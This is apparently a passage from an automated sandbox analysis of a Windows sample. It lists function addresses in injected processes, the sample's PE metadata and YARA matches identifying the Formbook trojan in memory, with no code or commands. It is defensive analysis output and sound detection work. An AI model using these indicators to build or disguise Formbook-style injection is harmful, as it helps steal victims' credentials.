                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155FB767_2_0155FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01515BF07_2_01515BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014DDBF97_2_014DDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BFB807_2_014BFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01557A467_2_01557A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155FA497_2_0155FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01513A6C7_2_01513A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154DAC67_2_0154DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E5AA07_2_014E5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01541AA37_2_01541AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153DAAC7_2_0153DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A3D407_2_014A3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01551D5A7_2_01551D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01557D737_2_01557D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BFDC07_2_014BFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01519C327_2_01519C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155FCF27_2_0155FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155FF097_2_0155FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01463FD57_2_01463FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01463FD27_2_01463FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A1F927_2_014A1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155FFB17_2_0155FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A9EB07_2_014A9EB0
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F874488_2_04F87448
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F8161A8_2_04F8161A
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F801A08_2_04F801A0
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F82AF08_2_04F82AF0
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F80B608_2_04F80B60
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F80B5B8_2_04F80B5B
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeCode function: 8_2_04F874388_2_04F87438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F010014_2_016F0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174600014_2_01746000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017802C014_2_017802C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170053514_2_01700535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170077014_2_01700770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0172475014_2_01724750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FC7C014_2_016FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171C6E014_2_0171C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171696214_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017029A014_2_017029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170A84014_2_0170A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170284014_2_01702840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0172E8F014_2_0172E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E68B814_2_016E68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0173889014_2_01738890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FEA8014_2_016FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170ED7A14_2_0170ED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170AD0014_2_0170AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FADE014_2_016FADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01708DC014_2_01708DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01718DBF14_2_01718DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01700C0014_2_01700C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0CF214_2_016F0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01774F4014_2_01774F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01720F3014_2_01720F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01742F2814_2_01742F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2FC814_2_016F2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177EFA014_2_0177EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01700E5914_2_01700E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01712E9014_2_01712E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EF17214_2_016EF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0173516C14_2_0173516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170B1B014_2_0170B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016ED34C14_2_016ED34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017033F314_2_017033F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171D2F014_2_0171D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171B2C014_2_0171B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017052A014_2_017052A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F146014_2_016F1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017474E014_2_017474E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170349714_2_01703497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170B73014_2_0170B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170995014_2_01709950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171B95014_2_0171B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170599014_2_01705990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0176D80014_2_0176D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017038E014_2_017038E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01775BF014_2_01775BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0173DBF914_2_0173DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171FB8014_2_0171FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01773A6C14_2_01773A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01703D4014_2_01703D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171FDC014_2_0171FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01779C3214_2_01779C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01719C2014_2_01719C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01701F9214_2_01701F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01709EB014_2_01709EB0
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EF09DC16_2_02EF09DC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EF29B116_2_02EF29B1
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02F10FF116_2_02F10FF1
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EE6FD316_2_02EE6FD3
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EF279116_2_02EF2791
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EF952C16_2_02EF952C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeCode function: 16_2_02EF953116_2_02EF9531
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C244617_2_045C2446
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B442017_2_045B4420
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045BE4F617_2_045BE4F6
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451053517_2_04510535
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045D059117_2_045D0591
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452C6E017_2_0452C6E0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0453475017_2_04534750
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451077017_2_04510770
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0450C7C017_2_0450C7C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045A200017_2_045A2000
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0459815817_2_04598158
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045AA11817_2_045AA118
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0450010017_2_04500100
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C81CC17_2_045C81CC
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045D01AA17_2_045D01AA
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C41A217_2_045C41A2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B027417_2_045B0274
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045902C017_2_045902C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CA35217_2_045CA352
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451E3F017_2_0451E3F0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045D03E617_2_045D03E6
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04510C0017_2_04510C00
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04500CF217_2_04500CF2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B0CB517_2_045B0CB5
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045ACD1F17_2_045ACD1F
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451AD0017_2_0451AD00
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0450ADE017_2_0450ADE0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04528DBF17_2_04528DBF
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04510E5917_2_04510E59
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CEE2617_2_045CEE26
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CEEDB17_2_045CEEDB
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04522E9017_2_04522E90
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CCE9317_2_045CCE93
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04584F4017_2_04584F40
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04530F3017_2_04530F30
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B2F3017_2_045B2F30
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04552F2817_2_04552F28
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04502FC817_2_04502FC8
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451CFE017_2_0451CFE0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0458EFA017_2_0458EFA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451A84017_2_0451A840
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451284017_2_04512840
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0453E8F017_2_0453E8F0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044F68B817_2_044F68B8
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452696217_2_04526962
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045129A017_2_045129A0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045DA9A617_2_045DA9A6
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0450EA8017_2_0450EA80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CAB4017_2_045CAB40
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C6BD717_2_045C6BD7
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0450146017_2_04501460
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CF43F17_2_045CF43F
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C757117_2_045C7571
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045D95C317_2_045D95C3
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045AD5B017_2_045AD5B0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0455563017_2_04555630
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C16CC17_2_045C16CC
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CF7B017_2_045CF7B0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045170C017_2_045170C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045BF0CC17_2_045BF0CC
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C70E917_2_045C70E9
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CF0E017_2_045CF0E0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045DB16B17_2_045DB16B
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0454516C17_2_0454516C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044FF17217_2_044FF172
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451B1B017_2_0451B1B0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452B2C017_2_0452B2C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B12ED17_2_045B12ED
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045152A017_2_045152A0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044FD34C17_2_044FD34C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C132D17_2_045C132D
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0455739A17_2_0455739A
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04589C3217_2_04589C32
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFCF217_2_045CFCF2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C1D5A17_2_045C1D5A
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04513D4017_2_04513D40
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C7D7317_2_045C7D73
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452FDC017_2_0452FDC0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04519EB017_2_04519EB0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFF0917_2_045CFF09
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044D3FD517_2_044D3FD5
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044D3FD217_2_044D3FD2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04511F9217_2_04511F92
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFFB117_2_045CFFB1
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0457D80017_2_0457D800
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045138E017_2_045138E0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451995017_2_04519950
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452B95017_2_0452B950
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045A591017_2_045A5910
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFA4917_2_045CFA49
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C7A4617_2_045C7A46
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04583A6C17_2_04583A6C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045BDAC617_2_045BDAC6
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04555AA017_2_04555AA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045ADAAC17_2_045ADAAC
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B1AA317_2_045B1AA3
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFB7617_2_045CFB76
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04585BF017_2_04585BF0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0454DBF917_2_0454DBF9
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452FB8017_2_0452FB80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023B1A7017_2_023B1A70
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023ACB8017_2_023ACB80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023AC96017_2_023AC960
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023AAC0017_2_023AAC00
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023A11A217_2_023A11A2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023CB1C017_2_023CB1C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023B36FB17_2_023B36FB
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023B370017_2_023B3700
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437E4E317_2_0437E4E3
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_043747F417_2_043747F4
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437E3C817_2_0437E3C8
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437E87C17_2_0437E87C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437D8E817_2_0437D8E8
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437CB9317_2_0437CB93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014D5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0148B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0151F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0176EA12 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0150EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01747E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 014E7E54 appears 111 times
                Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 0458F290 appears 105 times
                Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 044FB970 appears 280 times
                Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 04545130 appears 58 times
                Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 04557E54 appears 111 times
                Source: C:\Windows\SysWOW64\runas.exeCode function: String function: 0457EA12 appears 86 times
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: invalid certificate
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000000.2092163926.00000000002B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWoNP.exe: vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2183407633.0000000006EE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2177562789.00000000009EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2184155901.0000000007473000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exeBinary or memory string: OriginalFilenameWoNP.exe: vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
